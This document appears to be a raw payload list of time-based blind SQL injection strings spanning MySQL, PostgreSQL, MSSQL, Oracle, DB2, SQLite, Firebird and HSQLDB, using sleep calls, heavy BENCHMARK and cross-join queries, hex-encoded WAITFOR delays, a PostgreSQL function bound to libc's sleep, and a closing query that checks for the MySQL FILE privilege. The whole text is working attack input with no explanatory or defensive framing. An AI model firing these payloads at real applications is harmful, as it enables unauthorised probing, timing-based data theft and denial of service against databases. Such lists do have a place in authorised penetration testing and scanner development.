SELECT IF((19),SLEEP(3),29)
SELECT SLEEP(37)
SELECT IF((80),SLEEP(24),22)
SELECT SLEEP(49)
(SELECT * FROM (SELECT(SLEEP(51-(IF(96,0,79)))))Nz1d7DBfN)
(SELECT * FROM (SELECT(SLEEP(100)))e5ZQRgmgj)
(SELECT * FROM (SELECT(SLEEP(38-(IF(25,0,28)))))ZFpK65WUb)
(SELECT * FROM (SELECT(SLEEP(71)))MathYtqDv)
SELECT IF((90),BENCHMARK(96000000,MD5('KA3veiJgB')),41)
SELECT BENCHMARK(83000000,MD5('Eoyd5zy3D'))
SELECT IF((97),BENCHMARK(64000000,MD5('qVXuS4uRF')),3)
SELECT BENCHMARK(84000000,MD5('CoYPhHm3P'))
SELECT (CASE WHEN (78) THEN (SELECT 48 FROM PG_SLEEP(33)) ELSE 75 END)
SELECT PG_SLEEP(54)
SELECT (CASE WHEN (92) THEN (SELECT 81 FROM PG_SLEEP(94)) ELSE 82 END)
SELECT PG_SLEEP(59)
SELECT (CASE WHEN (69) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,61000000)) ELSE 87 END)
SELECT COUNT(*) FROM GENERATE_SERIES(1,95000000)
SELECT (CASE WHEN (86) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,87000000)) ELSE 94 END)
SELECT COUNT(*) FROM GENERATE_SERIES(1,70000000)
SELECT (CASE WHEN (85) THEN (SELECT 26 FROM SLEEP(54)) ELSE 28 END)
CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT
 SELECT sleep(30)
SELECT (CASE WHEN (73) THEN (SELECT 38 FROM SLEEP(56)) ELSE 18 END)
CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT
 SELECT sleep(83)
IF(36) WAITFOR DELAY '0:0:49'
WAITFOR DELAY '0:0:65'
DECLARE @x CHAR(9)
SET @x=0x303a303a338
IF(11) WAITFOR DELAY @x
DECLARE @x CHAR(9)
SET @x=0x303a303a32
WAITFOR DELAY @x
IF(8) WAITFOR DELAY '0:0:100'
WAITFOR DELAY '0:0:52'
DECLARE @x CHAR(9)
SET @x=0x303a303a331
IF(81) WAITFOR DELAY @x
DECLARE @x CHAR(9)
SET @x=0x303a303a344
WAITFOR DELAY @x
title Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)
SELECT CASE WHEN (60) THEN DBMS_PIPE.RECEIVE_MESSAGE('kqipw11q2',17) ELSE 6 END FROM DUAL
SELECT DBMS_PIPE.RECEIVE_MESSAGE('joCPTW45D',4) FROM DUAL
SELECT CASE WHEN (52) THEN DBMS_PIPE.RECEIVE_MESSAGE('RTC6wEv93',30) ELSE 25 END FROM DUAL
SELECT DBMS_PIPE.RECEIVE_MESSAGE('897jIQMtG',53) FROM DUAL
SELECT CASE WHEN (87) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 10 END FROM DUAL
SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
SELECT CASE WHEN (89) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 84 END FROM DUAL
SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
BEGIN IF (35) THEN DBMS_LOCK.SLEEP(17)
 ELSE DBMS_LOCK.SLEEP(0)
 END IF
 END
BEGIN DBMS_LOCK.SLEEP(93)
 END
BEGIN IF (45) THEN DBMS_LOCK.SLEEP(18)
 ELSE DBMS_LOCK.SLEEP(0)
 END IF
 END
BEGIN DBMS_LOCK.SLEEP(61)
 END
BEGIN IF (76) THEN USER_LOCK.SLEEP(99)
 ELSE USER_LOCK.SLEEP(0)
 END IF
 END
BEGIN USER_LOCK.SLEEP(5)
 END
BEGIN IF (49) THEN USER_LOCK.SLEEP(67)
 ELSE USER_LOCK.SLEEP(0)
 END IF
 END
BEGIN USER_LOCK.SLEEP(43)
 END
SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE (41)
SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3
SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE (67)
SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3
SELECT (CASE WHEN (22) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(3900000000/2))))) ELSE 91 END)
SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
SELECT (CASE WHEN (66) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))) ELSE 84 END)
SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(7400000000/2))))
SELECT IIF((61),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),51) FROM RDB$DATABASE
SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
SELECT IIF((30),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),54) FROM RDB$DATABASE
SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE (6)) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE (12)) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE (9)) AS T3
SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3
SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE (25)) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE (94)) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE (94)) AS T3
SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3
CALL CASE WHEN (46) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(5),0),1100000000),NULL) END
CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(75),0),2800000000),NULL)
CALL CASE WHEN (40) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(82),0),4300000000),NULL) END
CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(33),0),3000000000),NULL)
CALL CASE WHEN (73) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),8100000000),NULL) END
CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),6500000000),NULL)
CALL CASE WHEN (15) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),5800000000),NULL) END
CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),200000000),NULL)
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';